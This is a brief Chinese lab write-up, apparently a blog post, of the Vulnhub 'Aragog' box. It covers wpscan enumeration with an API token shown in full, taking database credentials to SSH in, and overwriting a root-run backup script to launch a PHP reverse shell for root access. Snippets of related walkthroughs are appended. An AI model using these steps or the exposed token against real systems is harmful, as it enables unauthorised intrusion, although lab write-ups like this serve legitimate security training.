概述

测试目的

wpscan --api-token=OGdgn8Ekao1Pt4jgVrO3AsxsWcQ4yC1liIzYC3756Tk --url=http://192.168.152.141/blog -e p --plugins-detection aggressive

在msf上面搜索漏洞

连上数据库以后获得账号密码，登录ssh

发现/opt/.backup.sh的可执行文件

修改内容

/usr/bin/php /tmp/php-reverse-shell

php-reverse-shel是卡利里面/usr/sharte/webshell/php里面的修改一下ip和端口就可以用了

监听等待

过了一会就得到了root权限

标签：--,192.168,漏洞,Aragog,测试,php
From： https://www.cnblogs.com/cll-wlaq/p/18306947

vulnhub - Aragog - writeup
信息收集目标开放了80、22端口。root@Locklytemp/tmp»arp-scan-Ieth1-lInterface:eth1,type:EN10MB,MAC:00:0c:29:fa:3d:23,IPv4:192.168.56.106Startingarp-scan1.10.0with256hosts(https://githu......
hackthebox --aragog
主机发现与爆破nmap-sT--min-rate1000010.10.10.78nmap-sT-sV-sC-O-p22,21,8010.10.10.78 发现有ftp匿名登陆└─$ftp10.10.10.78Connectedto10.10.10.78.220(vsFTPd3.0.3)Name(10.10.10.78:kali):anonymous230Loginsuccessful.Remotesystemtypeis......